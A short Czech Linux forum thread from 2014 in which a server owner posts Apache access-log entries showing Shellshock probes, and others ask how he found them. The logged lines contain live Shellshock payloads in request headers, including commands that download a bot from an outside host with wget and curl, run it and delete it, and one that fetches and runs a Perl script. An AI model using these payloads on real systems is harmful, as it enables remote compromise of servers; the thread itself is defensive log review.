Prosíme přihlašte se nebo zaregistrujte.

Přihlašte se svým uživatelským jménem a heslem.
Vaše pomoc je stále potřeba!

« předchozí další »
Stran: [1]

Autor Téma: shellshock /var/log/apache2/access.log  (Přečteno 2393 krát)

marshall1727

  • Aktivní člen
  • *
  • Příspěvků: 307
shellshock /var/log/apache2/access.log
« kdy: 29 Září 2014, 17:35:50 »
Hledal jsem a našel:
Kód: [Vybrat]
209.126.230.72 - - [25/Sep/2014:01:48:40 +0200] "GET / HTTP/1.0" 200 11783 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
54.251.83.67 - - [26/Sep/2014:11:57:26 +0200] "GET / HTTP/1.1" 200 11764 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
217.14.242.115 - - [28/Sep/2014:07:01:38 +0200] "GET / HTTP/1.0" 200 11783 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
193.251.74.117 - - [28/Sep/2014:10:58:56 +0200] "GET / HTTP/1.0" 200 11783 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
67.227.0.77 - - [29/Sep/2014:09:14:00 +0200] "GET / HTTP/1.0" 200 11783 "-" "() { :;}; /bin/bash -c \"wget -P /var/tmp 174.143.240.43/.../x ; perl /var/tmp/x\""
Zaujalo mě, že první oťukávání je z 25. tedy asi tak den před ofiko provalením.

m.
IP zaznamenána
--
koupil jsem si nový server a ladím ho. proto to zde spamuju. (2xXeon5110; IntelServerBoard S5000PSL; 2x2x1GbECC;4xRaptor150G)

sabraq

  • Závislák
  • ***
  • Příspěvků: 3412
  • Bootloader-není téma k hovoru,ani zbytný prostor
Re:shellshock /var/log/apache2/access.log
« Odpověď #1 kdy: 29 Září 2014, 17:55:15 »
Jak jsi hledal? Grepnul shellshock?
IP zaznamenána
PP v kolečku - není licence,pouze upozornění na reklamu
"Dress code" - oblečení podle předpisu(ne kódované oblečení)
CC v kolečku - je licence,značí,že se někdo nesmírně snaží

marshall1727

  • Aktivní člen
  • *
  • Příspěvků: 307
Re:shellshock /var/log/apache2/access.log
« Odpověď #2 kdy: 29 Září 2014, 18:07:39 »
ne, grepnul bash v access logu.
IP zaznamenána
--
koupil jsem si nový server a ladím ho. proto to zde spamuju. (2xXeon5110; IntelServerBoard S5000PSL; 2x2x1GbECC;4xRaptor150G)
Stran: [1]
« předchozí další »
 

Provoz zaštiťuje spolek OpenAlt.